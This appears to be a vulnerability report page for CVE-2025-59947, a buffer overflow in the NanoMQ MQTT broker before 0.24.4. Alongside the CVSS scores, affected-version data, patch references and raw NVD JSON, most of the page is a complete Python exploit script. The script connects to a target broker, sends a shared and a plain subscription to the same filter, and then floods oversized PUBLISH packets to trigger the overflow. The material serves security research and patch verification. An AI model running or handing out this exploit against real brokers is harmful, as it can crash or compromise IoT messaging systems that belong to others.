Security Vulnerability Report
CVE-2025-59947 CVSS 9.0 CRITICAL

CVE-2025-59947

Published: 2025-12-15 21:15:59
Last Modified: 2026-01-30 21:14:03

Description

NanoMQ is a messaging broker/bus for IoT Edge & SDV. Versions prior to 0.24.4 contain a buffer overflow (CWE-120) that is reached when a PUBLISH packet matches both a shared subscription and a vanilla (non-shared) subscription. This is fixed in version 0.24.4. As a workaround, disable shared subscription.

CVSS Details

CVSS Score
9.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:emqx:nanomq:*:*:*:*:*:*:*:* - VULNERABLE
NanoMQ < 0.24.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Run it only against a NanoMQ instance (version < 0.24.4) that you own or are explicitly authorized to test. The script sends MQTT packets blindly and reads nothing back from the broker, so any effect has to be observed on the broker side (process crash, sanitizer report), not from the client's output.
python
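#!/usr/bin/env python3
"""
CVE-2025-59947 PoC - NanoMQ Buffer Overflow in Shared Subscription

Trigger sequence: from one client, send a shared SUBSCRIBE
($share/<group>/<filter>) and a vanilla SUBSCRIBE for the same filter, then
PUBLISH to a topic under that filter so the broker has to deliver the message
through both subscription paths at once -- the condition the advisory names
as the overflow trigger (fixed in NanoMQ 0.24.4).

The client never reads CONNACK/SUBACK/PUBACK, so success is not observable
here; watch the broker process instead (crash, sanitizer report).

Packet-encoding fixes relative to the earlier version of this PoC:
  * CONNECT: the protocol name is an MQTT string and needs its 2-byte length
    prefix (0x00 0x04 'MQTT'); without it the broker reads "MQ" as a length.
  * PUBLISH: the remaining-length field is a variable-length integer,
    least-significant 7-bit group first with a continuation bit on every byte
    but the last; the old encoder emitted the groups in the wrong order with
    no continuation bits, so any packet over 127 bytes was malformed.
  * The hard-coded vanilla SUBSCRIBE bytes carried wrong length fields
    (remaining length 13 / filter length 9 for an 11-byte body and a 6-byte
    filter); it is now built by the same encoder as the shared SUBSCRIBE.

Note: This PoC is for educational and security research purposes only.
"""
import socket
import struct
import sys
import time

DEFAULT_PORT = 1883
# Packet identifiers for the two SUBSCRIBEs. Any non-zero value is valid;
# they only need to differ so the broker's SUBACKs would be distinguishable.
VANILLA_SUB_PACKET_ID = 1000
SHARED_SUB_PACKET_ID = 1001
# Largest value an MQTT remaining-length field can hold (4 bytes x 7 bits).
MAX_REMAINING_LENGTH = 268_435_455


def encode_remaining_length(length):
    """Encode *length* as an MQTT variable-length integer (1-4 bytes).

    Each output byte carries 7 bits, least-significant group first, and has
    bit 7 set on every byte except the last (MQTT 3.1.1, section 2.2.3).

    Args:
        length: number of bytes following the fixed header.

    Returns:
        The encoded field as bytes.

    Raises:
        ValueError: if length is negative or exceeds MAX_REMAINING_LENGTH.
    """
    if length < 0 or length > MAX_REMAINING_LENGTH:
        raise ValueError(f"remaining length out of range: {length}")
    out = bytearray()
    while True:
        digit = length % 128
        length //= 128
        if length > 0:
            digit |= 0x80  # more bytes follow
        out.append(digit)
        if length == 0:
            return bytes(out)


def encode_string(value):
    """Encode *value* (str or bytes) as an MQTT string: 2-byte big-endian length + data."""
    data = value.encode() if isinstance(value, str) else bytes(value)
    return struct.pack('!H', len(data)) + data


def build_packet(first_byte, body):
    """Prepend the MQTT fixed header (type/flags byte + remaining length) to *body*."""
    return bytes([first_byte]) + encode_remaining_length(len(body)) + body


def create_mqtt_connect_packet(client_id):
    """Create an MQTT 3.1.1 CONNECT packet (clean session, 60 s keep-alive).

    Args:
        client_id: client identifier (str or bytes) placed in the payload.

    Returns:
        The complete CONNECT packet as bytes.
    """
    protocol_level = b'\x04'  # MQTT 3.1.1
    connect_flags = b'\x02'   # Clean session; no will, username or password
    keep_alive = struct.pack('!H', 60)
    # Protocol name is an MQTT string, so it carries its 2-byte length prefix.
    variable_header = encode_string('MQTT') + protocol_level + connect_flags + keep_alive
    payload = encode_string(client_id)
    return build_packet(0x10, variable_header + payload)


def create_mqtt_publish_packet(topic, payload, qos=1, dup=0, retain=0):
    """Create an MQTT PUBLISH packet.

    Args:
        topic: topic name (str or bytes). exploit() publishes under a filter
            that is subscribed both via $share/<group>/<filter> and plainly,
            so the broker matches it through both subscription paths.
        payload: application message as bytes.
        qos: 0-2; a packet identifier (fixed at 1) is present only for qos > 0.
        dup: DUP flag bit of the fixed header.
        retain: RETAIN flag bit of the fixed header.

    Returns:
        The complete PUBLISH packet as bytes.
    """
    packet_type = 0x30 | (dup << 3) | (qos << 1) | retain
    variable_header = encode_string(topic)
    if qos > 0:
        variable_header += struct.pack('!H', 1)
    # build_packet emits a proper multi-byte remaining length; the topic plus
    # payload used by exploit() is well over 127 bytes.
    return build_packet(packet_type, variable_header + payload)


def create_subscribe_packet(topic_filter, packet_id=VANILLA_SUB_PACKET_ID, qos=1):
    """Create an MQTT SUBSCRIBE packet for a single topic filter.

    Args:
        topic_filter: the filter (str or bytes), e.g. "test/#".
        packet_id: non-zero packet identifier.
        qos: requested maximum QoS (0-2).

    Returns:
        The complete SUBSCRIBE packet as bytes (type 0x8, mandatory flags 0b0010).
    """
    body = struct.pack('!H', packet_id) + encode_string(topic_filter) + bytes([qos])
    return build_packet(0x82, body)


def create_shared_subscription_packet(group_id, topic_filter):
    """Create a SUBSCRIBE for the shared-subscription filter $share/{group}/{filter} at QoS 1.

    Args:
        group_id: share-group name.
        topic_filter: the underlying topic filter, e.g. "test/#".

    Returns:
        The complete SUBSCRIBE packet as bytes.
    """
    shared_topic = f"$share/{group_id}/{topic_filter}"
    return create_subscribe_packet(shared_topic, SHARED_SUB_PACKET_ID, 1)


def exploit(target_host, target_port=DEFAULT_PORT):
    """Drive the CVE-2025-59947 trigger sequence against one broker.

    Sequence: CONNECT, shared SUBSCRIBE, vanilla SUBSCRIBE for the same
    filter, then repeated PUBLISHes to a matching topic. Nothing is read back
    from the broker, so this function cannot tell whether the overflow
    occurred; observe the broker process. Network errors are printed and
    swallowed; other exceptions propagate.

    Args:
        target_host: broker hostname or IP address.
        target_port: broker TCP port (default 1883, plaintext MQTT).
    """
    print(f"[*] Targeting {target_host}:{target_port}")
    print(f"[*] Exploiting CVE-2025-59947: NanoMQ Buffer Overflow")
    try:
        # Context manager closes the socket on every exit path, including
        # an exception mid-sequence; sendall() avoids short writes.
        with socket.create_connection((target_host, target_port), timeout=10) as sock:
            print("[+] Connected to NanoMQ broker")

            # Step 1: CONNECT. No CONNACK is read; a rejected CONNECT would
            # only surface as the broker closing the socket on a later send.
            sock.sendall(create_mqtt_connect_packet("poc_client_59947"))
            print("[+] Sent CONNECT packet")

            # Step 2: shared subscription $share/exploit_group/test/#
            sock.sendall(create_shared_subscription_packet("exploit_group", "test/#"))
            print("[+] Sent shared SUBSCRIBE packet")

            # Step 3: vanilla subscription on the same filter, so a single
            # PUBLISH matches both the shared and the plain subscription.
            sock.sendall(create_subscribe_packet("test/#", VANILLA_SUB_PACKET_ID, 1))
            print("[+] Sent vanilla SUBSCRIBE packet")
            time.sleep(0.5)

            # Step 4: PUBLISH to a topic under test/#. The 512-byte topic and
            # 1 KiB payload are the PoC author's guess at sizes that overrun
            # the broker's buffer; the advisory gives no sizes, so confirm
            # against the patch commit before relying on them.
            evil_topic = "test/payload" + "A" * 500
            evil_payload = b"X" * 1024
            publish_packet = create_mqtt_publish_packet(evil_topic, evil_payload, qos=1)
            sock.sendall(publish_packet)
            # NOTE: "triggered" is not verified here -- nothing is read back.
            print("[+] Sent malicious PUBLISH packet - buffer overflow triggered")

            # Step 5: repeat to raise the odds of a corrupting write.
            for _ in range(10):
                sock.sendall(publish_packet)
                time.sleep(0.1)
            print("[+] Exploitation packets sent")
        print("[+] Done - Check target for potential compromise")
    except OSError as e:
        # Connection refused/reset, timeout, or the broker dropping the socket.
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else DEFAULT_PORT
    exploit(target, port)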

References

- Patch commit: https://github.com/nanomq/nanomq/commit/5f5581054bb92f102cf99251e8af2f43763d457b
- Issue tracking / patch discussion: https://github.com/nanomq/nanomq/issues/2110
- Vendor advisory: https://github.com/nanomq/nanomq/security/advisories/GHSA-98f4-cmg8-x7f3

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59947", "sourceIdentifier": "[email protected]", "published": "2025-12-15T21:15:59.157", "lastModified": "2026-01-30T21:14:03.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NanoMQ is a messaging broker/bus for IoT Edge & SDV. Versions prior to 0.24.4 have a buffer overflow case while the PUBLISH packets trigger both shared subscription and vanila subscription. This is fixed in version 0.24.4. As a workaround, disable shared subscription."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:H/SC:L/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:emqx:nanomq:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.24.4", "matchCriteriaId": "49D249C2-C388-4669-8801-929898E7DEAC"}]}]}], "references": [{"url": "https://github.com/nanomq/nanomq/commit/5f5581054bb92f102cf99251e8af2f43763d457b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nanomq/nanomq/issues/2110", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/nanomq/nanomq/security/advisories/GHSA-98f4-cmg8-x7f3", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}